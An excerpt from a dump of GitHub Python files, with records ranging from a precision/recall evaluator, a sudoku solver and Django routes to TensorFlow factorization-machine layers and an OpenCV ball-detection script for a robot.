readCSVFile (fileName):\n ''' Read the csv file and saves in a list structure '''\n\n lList = []\n lBolCat = [] # a list of booleans for categories \n\n # read the file and fill the video list\n with open(fileName) as csv_file:\n\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n line_count += 1\n\n vidName = row[0] # save video name (position [0] in the row)\n for i in range (1, len(row)):\n lBolCat.append(int(row[i]) ) # append the boolean to the list\n\n lLine = Line (vidName, lBolCat[:]) # create a line object, use the [:] to pass the variable by value\n lList.append(lLine) # append the line object to the list of videos\n lBolCat.clear() # clear the list\n\n print(f'Processed from {fileName} ' + sysColor.Green + str(line_count) + sysColor.White + ' lines.')\n return lList\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# CHECK IF THE STRUCTURE (ROWS AND COLUMNS) ARE THE SAME ON BOTH FILES\n#-------------------------------------------------------------------\ndef checkStructure (testVid, catVid):\n ''' Check if two csv files have the same number of columns and rows ''' \n isOK = False\n tRow = len(testVid) # number of rows\n cRow = len(catVid)\n\n if ((tRow > 0) and (tRow == cRow)): # if they have the same number of rows\n if (testVid[0].getNumberofCategories() == catVid[0].getNumberofCategories()):\n isOK = True\n \n return isOK\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# CHECK IF THE ARGUMENTS ARE OK\n#-------------------------------------------------------------------\ndef checkArguments(args):\n ''' Check the validity of the arguments passed. '''\n\n if (len(args) == 1 ): # number of arguments is ok?\n print(sysColor.Red + 'ATTENTION:' + sysColor.White + ' Invalid number of arguments, type \"CalcPR --help\" for help.')\n return False\n\n if (args[1] == '--help'): # calls help\n print(sysColor.Green + 'Use the following arguments:\\n' + \n sysColor.Green + '1' + sysColor.White + ' - csv file with ground truth.\\n' + \n sysColor.Green + '2' + sysColor.White + ' - csv file with estimation to be evaluated.\\n' + \n sysColor.Green + '3' + sysColor.White + '... - name of categories to test (separated by spaces).\\n' +\n sysColor.Yellow + 'If no category is selected the program runs all categories' + sysColor.White )\n return False\n\n suffix = '.csv'\n if (not( (args[1].endswith(suffix) == True) and (args[2].endswith(suffix) == True) )): # check if the files are csv files\n print (sysColor.Red + 'ATTENTION:' + sysColor.White + ' First and second arguments must be .csv files')\n return False\n\n return True\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n#\n#-------------------------------------------------------------------\ndef getCategoriesToRun(args):\n\n from Categories import NewCat\n bolCats = []\n\n for i in range (0,Line.NR_CATEGORIES): # fill the categories list with falses\n bolCats.append (False)\n\n #get the categories passed as paremeters in terminal\n cats = args[3:] # the arguments 3 and onwards are the categories\n \n if (len(cats) >= 1 ): \n print ('Categories selected: ' + sysColor.Blue + str(cats) + sysColor.White)\n for cat in cats:\n # 1. check if category name exist in list and get the index\n for i in range (0, len(NewCat) ):\n if (cat == NewCat[i]):\n bolCats[i] = True\n\n else: # no category selected do all categories\n print ('All categories selected')\n for i in range (0,Line.NR_CATEGORIES): # fill the categories list iwth falses\n bolCats[i] = True\n \n return bolCats\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# CLEAR THE TERMINAL SCREEN\n# platform.system() identifies the OS 'Linux', 'Windows' or 'Darwin'(for MacOS)\n#-------------------------------------------------------------------\ndef clearTerminal():\n import platform\n if ( platform.system() == 'Windows'): os.system('cls')\n else: os.system('clear')\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\ndef execute ():\n\n clearTerminal()\n\n # 0. Test the arguments\n if (checkArguments(sys.argv) == False):\n os._exit(1)\n\n # 1. read the GROUND TRUTH csv\n #print ('1. Load file with ground truth.')\n testVid = readCSVFile (sys.argv[1]) # (\"TestBOOLEANGroundTruth.csv\") \n\n # 2. Read the ESTIMATED CATEGORIES csv\n #print ('2. Load file with estimated categories.')\n cateVid = readCSVFile (sys.argv[2]) # (\"TestBOOLEANUnWeightVote.csv\")\n\n # 3. Test if structure (number of columns and rows) of both files are the same\n #print ('3. Checking if both files have the same number of categories.')\n if ( checkStructure (testVid, cateVid) == False):\n print (sysColor.Red + 'ATTENTION:' + sysColor.White + ' Files do not have the same number of columns and rows!' )\n os._exit(1)\n\n # 4. Get list of categories to test, the return is a list of booleans with the categories to calculate\n #print ('4. Get category list.')\n print (sysColor.Red + \"number of categories \" + str(Line.NR_CATEGORIES) + sysColor.White)\n categoryToRun = getCategoriesToRun (sys.argv)\n \n RE_List = [] #relevant result list\n TP_List = [] #true positive list\n FP_List = [] #false positive list\n precision = [] #to store the results of the precision\n recall = [] #to store the result of the racll calculation\n fScore = [] #to store the F1 Score\n catNames = [] #saves the names of the selected categories for \n\n # 5. For each Category\n for index in range (0,Line.NR_CATEGORIES): # loop the number of categories\n \n if (categoryToRun[index] == True): # if the category was selected then calculate\n\n currentCat = NewCat[index]\n catNames.append(currentCat) # save the category name for later use\n\n # 5.0 loop to find the number of relevant occurences for each category\n #----------------------------------------------------------------\n relevantElements = 0 \n #loop to sum all relevant elements\n for vid in testVid:\n if (vid.isCategory(index) == True): \n relevantElements += 1\n print(f'Relevant elements found for category {currentCat} -> {relevantElements} ')\n RE_List.append(relevantElements * 1.0) #multiplying by 1.0 to save a float value for later calculations \n #----------------------------------------------------------------\n\n\t #5.1. loop to find the true positives - category exist in both vote and test\n #----------------------------------------------------------------\n truePositives = 0 \n #loop to sum all relevant elements\n for i in range (0, len(cateVid) ):\n if ((testVid[i].isCategory(index)==True) and (cateVid[i].isCategory(index)==True)):\n truePositives += 1\n print(f'True Positives found for category {currentCat} -> {truePositives} ')\n TP_List.append(truePositives * 1.0) #multiplying by 1.0 to save the float value\n #---------------------------------------------------------------- \n\n\t #5.2 loop to find the false positives - category exist in vote but not in test\n #----------------------------------------------------------------\n #loop to find the false positives - category exist in vote but not in test\n falsePositives = 0 \n #loop to sum all relevant elements\n for i in range (0, len(cateVid) ):\n if ((testVid[i].isCategory(index)== False) and (cateVid[i].isCategory(index) == True)):\n falsePositives += 1\n print(f'False Positives found for category {currentCat} -> {falsePositives} ')\n FP_List.append(falsePositives * 1.0) #multiplying by 1.0 to save the float value\n #----------------------------------------------------------------\n\n\t#6. Calculates precision and recall for each category\n for i in range(len(FP_List)):\n if (TP_List[i] != 0):\n precision.append(100.0 * TP_List[i] / (TP_List[i] + FP_List[i])) \n recall.append(100.0 * TP_List[i] / RE_List[i])\n else:\n precision.append(0.0)\n recall.append(0.0)\n\n #7. Calculate the fScore\n for i in range(len(FP_List)):\n if (TP_List[i] != 0):\n fScore.append( 2 * (precision[i] * recall[i]) / (precision[i] + recall[i]) )\n else:\n fScore.append (0.0)\n\n for i in range(len(precision)):\n print (f'Category: {catNames[i]} - precision: {precision[i]} - recall: {recall[i]} ')\n\n\t#8. save output to file\n #--------------------------------------\n catNames.insert(0, \"CATEGORIES\")\n precision.insert(0, \"precision\")\n recall.insert(0, \"recall\")\n fScore.insert(0, \"f_score\")\n myData = [catNames, precision, recall, fScore] \n myFile = open('PR_output.csv', 'w') \n with myFile: \n writer = csv.writer(myFile)\n writer.writerows(myData)\n catNames.pop(0)\n precision.pop(0)\n recall.pop(0)\n fScore.pop(0)\n #--------------------------------------\n\n #saves the report in another file\n catNames.insert(0, \"CATEGORIES\")\n RE_List.insert(0, 'relevant')\n TP_List.insert(0, 'true_positives')\n FP_List.insert(0, 'false_positives')\n myData = [catNames, RE_List, TP_List, FP_List] \n myFile = open('report.csv', 'w') \n with myFile: \n writer = csv.writer(myFile)\n writer.writerows(myData)\n catNames.pop(0)\n RE_List.pop(0)\n TP_List.pop(0)\n FP_List.pop(0)\n\n #now saves precision and recall in a csv file (A NEW FORMAT TO GENERATE A DIAGRAM EASIER)\n # Save in the csv file\n text_file = open(\"outputForGraph.csv\", \"w\")\n for i in range(len(precision)):\n text_file.write(catNames[i] + ',' + str(precision[i]/100) + ','+ str(recall[i]/100) + ',' + str(fScore[i]/100) + '\\n')\n text_file.close()\n\ndef main ():\n execute()\n\nmain()\n","repo_name":"Cadesh/Python_Attic","sub_path":"PrecisionRecall/CalcPR.py","file_name":"CalcPR.py","file_ext":"py","file_size_in_byte":12926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42105199987","text":"#\r\n# Code to preview metadata for the \"NOAA Fisheries Steller Sea Lion Population Count\" dataset:\r\n#\r\n# https://www.kaggle.com/competitions/noaa-fisheries-steller-sea-lion-population-count\r\n#\r\n\r\n#%% Imports and constants\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\ntrain_folder = r'g:\\temp\\drone-datasets\\noaa-fisheries-steller-sea-lion-population-count\\Train'\r\ntrain_metadata_file = r'train.csv'\r\ntrain_metadata_path = os.path.join(train_folder,train_metadata_file)\r\n\r\nassert os.path.isdir(train_folder)\r\nassert os.path.isfile(train_metadata_path)\r\n\r\n\r\n#%% Process metadata, make sure files exist\r\n\r\ndf = pd.read_csv(train_metadata_path)\r\n\r\nprint('Loaded metadata for {} images'.format(len(df)))\r\n\r\nn_animals = 0\r\n\r\nfor i_row,row in df.iterrows():\r\n train_id = row['train_id']\r\n image_file = os.path.join(train_folder,str(train_id) + '.jpg')\r\n assert os.path.isfile(image_file)\r\n n_animals += (row['adult_males']+row['subadult_males']+row['adult_females']+row['juveniles']+row['pups'])\r\n\r\nprint('Counts total {} animals'.format(n_animals))","repo_name":"agentmorris/agentmorrispublic","sub_path":"aerial-drone-data-preview/preview-steller-sea-lion-count.py","file_name":"preview-steller-sea-lion-count.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"42643412498","text":"import sys\n\ndef backtraking(depth):\n global exit_flag\n\n if (depth == len(blank_list)):\n exit_flag = True\n for i in range(9):\n for j in range(9):\n print(sudoku_board[i][j], end = \" \")\n print()\n \n else:\n for k in range(1, 10):\n if (exit_flag):\n break\n\n if (row_check(blank_list[depth][0], k) and column_check(blank_list[depth][1], k) and box_check(blank_list[depth][0], blank_list[depth][1], k)):\n sudoku_board[blank_list[depth][0]][blank_list[depth][1]] = k\n backtraking(depth + 1)\n sudoku_board[blank_list[depth][0]][blank_list[depth][1]] = 0\n\ndef row_check(row, cell):\n for i in range(9):\n if (sudoku_board[row][i] == cell):\n return False\n return True\n\ndef column_check(column, cell):\n for i in range(9):\n if (sudoku_board[i][column] == cell):\n return False\n return True\n\ndef box_check(row, column, cell):\n for i in range(row // 3 * 3, row // 3 * 3 + 3):\n for j in range(column // 3 * 3, column // 3 * 3 + 3):\n if (sudoku_board[i][j] == cell):\n return False\n return True\n\nsudoku_board = []\nblank_list = []\n\nfor i in range(9):\n sudoku_board.append(list(map(int, sys.stdin.readline().split())))\n\nfor i in range(9):\n for j in range(9):\n if (sudoku_board[i][j] == 0):\n blank_list.append([i, j])\n\nexit_flag = False\n\nbacktraking(0)","repo_name":"Choojj/acmicpc","sub_path":"단계별/15. 백트래킹/06. 스도쿠.py","file_name":"06. 스도쿠.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14368698834","text":"from django.urls import re_path\r\nfrom . import views\r\n\r\n\r\nurlpatterns = [\r\n re_path(r'^index/{0,1}$', views.index, name='index'),\r\n re_path(r'^article/\\d{4,4}/\\d{1,2}/(?P\\d+)/{0,1}$', views.article),\r\n re_path(r'^articles/list/{0,1}$', views.article_list, name='article_list'),\r\n re_path(r'^addArticle/{0,1}$', views.addArticle, name='addArticle'),\r\n re_path(r'^modifyArticle/(?P\\d+)/{0,1}$', views.modifyArticle, name='modifyArticle'),\r\n re_path(r'^deleteArticle/(?P\\d+)/{0,1}$', views.deleteArticle, name='deleteArticle'),\r\n re_path(r'^accounts/login/{0,1}$', views.login, name='login'),\r\n re_path(r'^accounts/logout/{0,1}$', views.logout, name='logout'),\r\n re_path(r'test/markdown/{0,1}$', views.test, name='test'),\r\n]","repo_name":"nigelaji/myblog","sub_path":"myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15071488161","text":"class Solution:\n def findSpecialInteger(self, arr: List[int]) -> int:\n n = len(arr)\n span = n // 4 + 1\n for i in range(0, n, span):\n l = bisect.bisect_left(arr, arr[i])\n r = bisect.bisect_right(arr, arr[i])\n if r - l >= span:\n return arr[i]\n return -1\n","repo_name":"woozway/py3-LeetCode","sub_path":"algorithms/1287. Element Appearing More Than 25% In Sorted Array.py","file_name":"1287. Element Appearing More Than 25% In Sorted Array.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37256652667","text":"import Evaluator, Parser\r\n\r\ndef interpreter():\r\n # Asks for user input for a program\r\n program = input(\"Please enter a LISP program:\\n\")\r\n # Parses the program then evaluates and prints the result\r\n print(Evaluator.eval(Parser.parse(program)))\r\n\r\n\r\ninterpreter()","repo_name":"kqian5/Lisp-Interpreter","sub_path":"Interpreter.py","file_name":"Interpreter.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34342833765","text":"filename = \"12-中国象棋棋盘.svg\"\nboard_rect = [0, 0, 10, 11]\nout_rect = [0, 0, 8, 9]\nlines = []\ngrid = 30 # 每个格子的像素\nfor i in range(1, 9):\n lines.append((0, i, 8, i))\nfor i in range(1, 8):\n if i == 0 or i == 8:\n lines.append((i, 0, i, 9))\n else:\n lines.append((i, 0, i, 4))\n lines.append((i, 5, i, 9))\nlines.append((3, 0, 5, 2))\nlines.append((5, 0, 3, 2))\nlines.append((3, 9, 5, 7))\nlines.append((3, 7, 5, 9))\n\n\ndef get_rect(rect):\n return f''\n\n\ndef get_stroke_rect(rect):\n rect = [i + 1 for i in rect]\n w, h = rect[2] - rect[0], rect[3] - rect[1]\n return f''''''\n\n\ndef get_line(line):\n line = [i + 1 for i in line]\n return f''\n\n\ndef line_str():\n return '\\n'.join(get_line(line) for line in lines)\n\n\nsvg = f\"\"\"\n\n 画一个象棋棋盘\n 有两下子\n {get_rect(board_rect)}\n {get_stroke_rect(out_rect)}\n {line_str()}\n\n\"\"\"\nopen(filename, 'w').write(svg)\n","repo_name":"weiyinfu/learnSvg","sub_path":"11-中国象棋棋盘.py","file_name":"11-中国象棋棋盘.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39419627872","text":"from collections import Counter, namedtuple\nimport csv\n\ndef get_header(csv_stream):\n header = csv_stream.__next__()\n for colno, column in enumerate(header):\n header[colno] = column.strip()\n return header\n\ndef main():\n cntr = Counter()\n with open(r'C:\\Users\\Phil\\pytalk\\Building_Permits.csv') as csv_file:\n csv_reader = csv.reader(csv_file)\n header = get_header(csv_reader)\n building_permit = namedtuple('BuildingPermit',header, rename=True)\n for line in csv_reader:\n fields = building_permit(*line)\n cntr['Total lines'] += 1\n cntr[fields.PERMIT_TYPE] += 1\n paid = float(fields.AMOUNT_PAID[1:])\n cntr[fields.PERMIT_TYPE+'_paid'] += paid\n cntr['Total paid'] += paid\n print(\"Report on columns PERMIT_TYPE and AMOUNT_PAID\\n\")\n for ctr in sorted(cntr.keys()):\n if ctr == 'Total lines':\n print('%-30s %8d %6.2f %15.2f %6.2f' % (ctr, cntr[ctr],\n ((cntr[ctr]*100)/cntr['Total lines']),\n cntr['Total paid'],\n 100.0))\n elif not ctr.endswith('paid'):\n print('%-30s %8d %6.2f %15.2f %6.2f' % (ctr, cntr[ctr],\n ((cntr[ctr]*100)/cntr['Total lines']),\n cntr[ctr+'_paid'],\n ((cntr[ctr+'_paid']*100)/cntr['Total paid'])))\n\nif __name__ == '__main__':\n main()\n","repo_name":"verisimilidude/TheCollectionsModule","sub_path":"analysis4.py","file_name":"analysis4.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"37277209646","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 17 17:51:29 2019\n\n@author: Binatang Kesusahan\n\"\"\"\nimport cv2 as cv\nimport numpy as np\nimport imutils\nimport rw_file as rw\n\nimport time\nimport serial as Serial\nfrom save_load import read as read\nfrom save_load import saveConfig as saveConfig\n\ndef serial(posisi):\n ser = Serial('/dev/ttyUSB0',)\n ser.baudrate = 115200\n \n while 1:\n if (posisi == '1'):\n ser.write(str(1).encode())\n print('kiri, 101')\n time.sleep(0.1)\n ser.write(str(0).encode())\n time.sleep(0.1)\n ser.write(str(1).encode())\n \n elif (posisi == '2'):\n print('kiri, nyala 1010 x')\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n \n elif (posisi == '3'):\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n time.sleep(0.1)\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n time.sleep(0.1)\n ser.write(str(1).encode())\n time.sleep(0.1)\n ser.write(str(0).encode())\n \n \n print(ser.readline())\n return 0\n\ndef centroid(contours):\n# center =0\n# cx =0 \n# cy =0\n \n c = max(contours, key= cv.contourArea)\n ((x,y), radius) = cv.minEnclosingCircle(c)\n M = cv.moments(c)\n \n # untuk calculate centroid\n if int(M[\"m00\"])> 0:\n cx = int(M[\"m10\"]) / int(M[\"m00\"])\n cy = int(M[\"m01\"]) / int(M[\"m00\"])\n center = (int(cx), int(cy)) \n \n else:\n center = (1,1) \n return(radius,center, cx, cy,x,y)\n \ndef saveConfig(value, file_name):\n value = str(value)\n filename = file_name + \".txt\"\n file = open(str(filename), \"w\")\n file.write(value)\n file.close()\n\n\ndef gawang(hsv):\n \n l_h = int(read(\"setting/LH_gawang.txt\"))\n l_s = int(read(\"setting/LS_gawang.txt\"))\n l_v = int(read(\"setting/LV_gawang.txt\"))\n u_h = int(read(\"setting/UH_gawang.txt\"))\n u_s = int(read(\"setting/US_gawang.txt\"))\n u_v = int(read(\"setting/UV_gawang.txt\"))\n \n lower_color = np.array([l_h,l_s,l_v])\n upper_color = np.array([u_h,u_s,u_v])\n \n mask = cv.inRange(hsv, lower_color, upper_color)\n kernel = np.ones((5,5), np.uint8)\n \n mask = cv.erode(mask, kernel)\n \n _, contours, _ = cv.findContours(mask, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n \n if len(contours) > 0:\n radius_gawang, center_gawang, cx_gawang, cy_gawang, _, _ = centroid(contours)\n return(radius_gawang, center_gawang, cx_gawang, cy_gawang)\n \n \ncap = cv.VideoCapture(0)\ncap.set(cv.CAP_PROP_FRAME_WIDTH, 120)\ncap.set(cv.CAP_PROP_FRAME_HEIGHT, 240)\n\ncv.namedWindow(\"trackbars\", cv.WINDOW_NORMAL)\ncv.resizeWindow(\"trackbars\", 300, 500)\ncv.createTrackbar(\"L - H\", \"trackbars\", int(rw.read(\"setting/LH.txt\")), 179, lambda x: rw.write(x, \"setting/LH.txt\"))\ncv.createTrackbar(\"L - S\", \"trackbars\", int(rw.read(\"setting/LS.txt\")), 255, lambda x : rw.write(x, \"setting/LS.txt\"))\ncv.createTrackbar(\"L - V\", \"trackbars\", int(rw.read(\"setting/LV.txt\")), 255, lambda x : rw.write(x, \"setting/LV.txt\"))\ncv.createTrackbar(\"U - H\", \"trackbars\", int(rw.read(\"setting/UH.txt\")), 179, lambda x: rw.write(x, \"setting/UH.txt\"))\ncv.createTrackbar(\"U - S\", \"trackbars\", int(rw.read(\"setting/US.txt\")), 255, lambda x: rw.write(x, \"setting/US.txt\"))\ncv.createTrackbar(\"U - V\", \"trackbars\", int(rw.read(\"setting/UV.txt\")), 255, lambda x : rw.write(x, \"setting/UV.txt\"))\n\ncv.createTrackbar(\"dilation\", \"trackbars\", int(rw.read(\"setting/dilation_bola.txt\")), 50, lambda x : rw.write(x, \"setting/dilation_bola.txt\"))\ncv.createTrackbar(\"Dilation iterations\", \"trackbars\", int(rw.read(\"setting/dilation_iteration_bola.txt\")), 200, lambda x : rw.write(x, \"setting/dilation_iteration_bola.txt\"))\ncv.createTrackbar(\"erosion\", \"trackbars\", int(rw.read(\"setting/erosion_bola.txt\")), 50, lambda x : rw.write(x, \"setting/erosion_bola.txt\"))\ncv.createTrackbar(\"Erosion iterations\", \"trackbars\", int(rw.read(\"setting/erosion_iteration_bola.txt\")), 200, lambda x : rw.write(x, \"setting/erosion_iteration_bola.txt\"))\ncv.createTrackbar(\"gaussian\", \"trackbars\", int(rw.read(\"setting/gaussian_bola.txt\")), 20, lambda x : rw.write(x, \"setting/gaussian_bola.txt\"))\ncv.createTrackbar(\"radius\", \"trackbars\", int(rw.read(\"setting/radius_bola.txt\")), 50, lambda x : rw.write(x, \"setting/radius_bola.txt\"))\n\n\n\nwhile True:\n ret, frame = cap.read()\n frame = imutils.resize(frame, width=300)\n tinggi, panjang, _ = frame.shape\n\n gaussian_kernel = int(rw.read(\"setting/gaussian_bola.txt\"))\n if gaussian_kernel == 0:\n gaussian_kernel = 1\n else:\n gaussian_kernel = (2*gaussian_kernel)+1\n\n frame = cv.GaussianBlur(frame, (gaussian_kernel,gaussian_kernel), 0)\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n\n l_h = int(rw.read(\"setting/LH.txt\"))\n l_s = int(rw.read(\"setting/LS.txt\"))\n l_v = int(rw.read(\"setting/LV.txt\"))\n u_h = int(rw.read(\"setting/UH.txt\"))\n u_s = int(rw.read(\"setting/US.txt\"))\n u_v = int(rw.read(\"setting/UV.txt\"))\n\n lower_white = np.array([l_h,l_s,l_v])\n upper_white = np.array([u_h,u_s,u_v])\n\n mask = cv.inRange(hsv, lower_white, upper_white)\n\n erosion = int(rw.read(\"setting/erosion_bola.txt\"))\n\n if erosion == 0:\n erosion = 1\n else:\n erosion = (2*erosion)+1\n\n dilation= int(rw.read(\"setting/dilation_bola.txt\"))\n if dilation == 0:\n dilation = 1\n else:\n dilation = (2*dilation)+1\n\n erosion_iterations = int(rw.read(\"setting/erosion_iteration_bola.txt\"))\n dilation_iterations = int(rw.read(\"setting/dilation_iteration_bola.txt\"))\n\n erosion_kernel = cv.getStructuringElement(cv.MORPH_RECT, (erosion, erosion))\n dilation_kernel = cv.getStructuringElement(cv.MORPH_RECT, (dilation, dilation))\n\n mask = cv.erode(mask, erosion_kernel, iterations = erosion_iterations)\n mask = cv.dilate(mask, dilation_kernel, iterations = dilation_iterations)\n\n result = cv.bitwise_and(frame, frame, mask = mask)\n\n contours, _ = cv.findContours(mask, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n\n x = 0\n y = 0\n radius = 0\n center_gawang = 0\n radius_gawang = 0\n cx_gawang = 0\n cy_gawang = 0\n\n rads_gawang = int(read(\"setting/area_gawang.txt\"))\n \n if len(contours) > 0:\n radius, center, cx, cy, x, y = centroid(contours)\n \n rads = int(read(\"setting/radius.txt\"))\n if radius > rads :\n \n if x < panjang/3 and y < 2*tinggi/3:\n print(\"kiri atas\")\n posisi = 1\n# serial(posisi)\n radius_gawang, center_gawang, cx_gawang, cy_gawang = gawang(hsv)\n if radius_gawang > rads_gawang:\n cv.circle(result, center_gawang, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx_gawang), int(cy_gawang)), (10, frame.shape[0]-70), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n cv.putText(result, \"KIRI ATAS\", (10, tinggi - 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, (100,255,10), 1)\n \n elif x < 2*panjang/3 and y < 2*tinggi/3:\n print(\"tengah atas\")\n posisi = 2\n# serial(posisi)\n radius_gawang, center_gawang, cx_gawang, cy_gawang = gawang(hsv)\n if radius_gawang > rads_gawang:\n cv.circle(result, center_gawang, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx_gawang), int(cy_gawang)), (10, frame.shape[0]-70), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n cv.putText(result, \"TENGAH ATAS\", (10, tinggi - 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, (100,250,10),1)\n \n elif x > 2*panjang/3 and y < 2*tinggi/3:\n print(\"kanan atas\")\n posisi = 3\n# serial(posisi)\n radius_gawang, center_gawang, cx_gawang, cy_gawang = gawang(hsv)\n if radius_gawang > rads_gawang:\n cv.circle(result, center_gawang, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx_gawang), int(cy_gawang)), (10, frame.shape[0]-70), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n cv.putText(result, \"KANAN ATAS\", (10, tinggi - 40), cv.FONT_HERSHEY_SIMPLEX, 0.5, (100,250,10),1)\n \n cv.circle(result, (int(x), int(y)), int(radius), (0,255,255), 2)\n cv.circle(result, center, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(cx), int(cy)), (10, tinggi-25), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n \n\n end = time.time()\n fps = str(int(1/(end-start)))\n cv.putText(result, fps, (10, tinggi-55), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n# Buat Garis Area di Layar\n cv.line(result, (int(panjang/3), tinggi), (int(panjang/3),0), (0,255,0), 2) #kiri\n cv.line(result, (int(2*panjang/3), tinggi), (int(2*panjang/3),0), (0,255,0), 2) # kanan\n cv.line(result, (0, int(2*tinggi/3)), (panjang, int(2*tinggi/3) ), (123,10,32), 2) #bawah\n \n \n cv.imshow(\"result\", result)\n cv.imshow(\"mask\", mask)\n\n\n x = 0\n y = 0\n radius = 0\n center = None\n\n if len(contours) > 0:\n c = max(contours, key=cv.contourArea)\n ((x, y), radius) = cv.minEnclosingCircle(c)\n M = cv.moments(c)\n\n cx = None\n cy = None\n\n if int(M[\"m00\"]) > 0:\n cx = int(M[\"m10\"]) / int(M[\"m00\"])\n cy = int(M[\"m01\"]) / int(M[\"m00\"])\n center = (int(cx), int(cy))\n\n rads = int(rw.read(\"setting/radius_bola.txt\"))\n if radius > rads :\n\n cv.circle(result, (int(x), int(y)), int(radius), (0,255,255), 2)\n cv.circle(result, center, 5, (0,0,255), -1)\n cv.putText(result, \"x : {} y : {}\".format(int(x), int(y)), (10, tinggi-25), cv.FONT_HERSHEY_COMPLEX_SMALL,0.8, (10,255,10))\n\n cv.line(result, (int(panjang/3), tinggi), (int(panjang/3),0), (0,255,0), 2) #kiri\n cv.line(result, (int(2*panjang/3), tinggi), (int(2*panjang/3),0), (0,255,0), 2) # kanan\n cv.line(result, (0, int(2*tinggi/3)), (panjang, int(2*tinggi/3) ), (123,10,32), 2) #bawah\n\n cv.imshow(\"result\", result)\n cv.imshow(\"mask\", mask)\n cv.imshow(\"frame\", frame)\n\n key = cv.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv.destroyAllWindows()\n","repo_name":"SMAMHTN/bascorro_cv","sub_path":"OldScript/bola_lama.py","file_name":"bola_lama.py","file_ext":"py","file_size_in_byte":10605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70198888245","text":"'''\n# Time : 2020/10/22 10:42\n# Author : junchaoli\n# File : model.py\n'''\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Layer\nfrom tensorflow.keras.layers import Input, Dense\n\nclass FM_layer(Layer):\n def __init__(self, k, w_reg, v_reg):\n super().__init__()\n self.k = k\n self.w_reg = w_reg\n self.v_reg = v_reg\n\n def build(self, input_shape):\n self.w0 = self.add_weight(name='w0', shape=(1,),\n initializer=tf.zeros_initializer(),\n trainable=True,)\n self.w = self.add_weight(name='w', shape=(input_shape[-1], 1),\n initializer=tf.random_normal_initializer(),\n trainable=True,\n regularizer=tf.keras.regularizers.l2(self.w_reg))\n self.v = self.add_weight(name='v', shape=(input_shape[-1], self.k),\n initializer=tf.random_normal_initializer(),\n trainable=True,\n regularizer=tf.keras.regularizers.l2(self.v_reg))\n\n def call(self, inputs, **kwargs):\n linear_part = tf.matmul(inputs, self.w) + self.w0 #shape:(batchsize, 1)\n\n inter_part1 = tf.pow(tf.matmul(inputs, self.v), 2) #shape:(batchsize, self.k)\n inter_part2 = tf.matmul(tf.pow(inputs, 2), tf.pow(self.v, 2)) #shape:(batchsize, self.k)\n inter_part = 0.5*tf.reduce_sum(inter_part1 - inter_part2, axis=-1, keepdims=True) #shape:(batchsize, 1)\n\n output = linear_part + inter_part\n return output\n\nclass Dense_layer(Layer):\n def __init__(self, hidden_units, output_dim, activation):\n super().__init__()\n self.hidden_units = hidden_units\n self.output_dim = output_dim\n self.activation = activation\n\n self.hidden_layer = [Dense(i, activation=self.activation)\n for i in self.hidden_units]\n self.output_layer = Dense(self.output_dim, activation=None)\n\n def call(self, inputs):\n x = inputs\n for layer in self.hidden_layer:\n x = layer(x)\n output = self.output_layer(x)\n return output\n","repo_name":"jc-LeeHub/Recommend-System-tf2.0","sub_path":"DeepFM/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":571,"dataset":"github-code","pt":"76"} +{"seq_id":"13345387862","text":"# Напишите программу, которая принимает две строки вида “a/b” - дробь с числителем и знаменателем. \n# Программа должна возвращать сумму и произведение* дробей. \n# Для проверки своего кода используйте модуль fractions.\nfrom fractions import Fraction\nfrom math import gcd\n\na1, b1 = map(int, input('Введите первое число в формате “a/b” 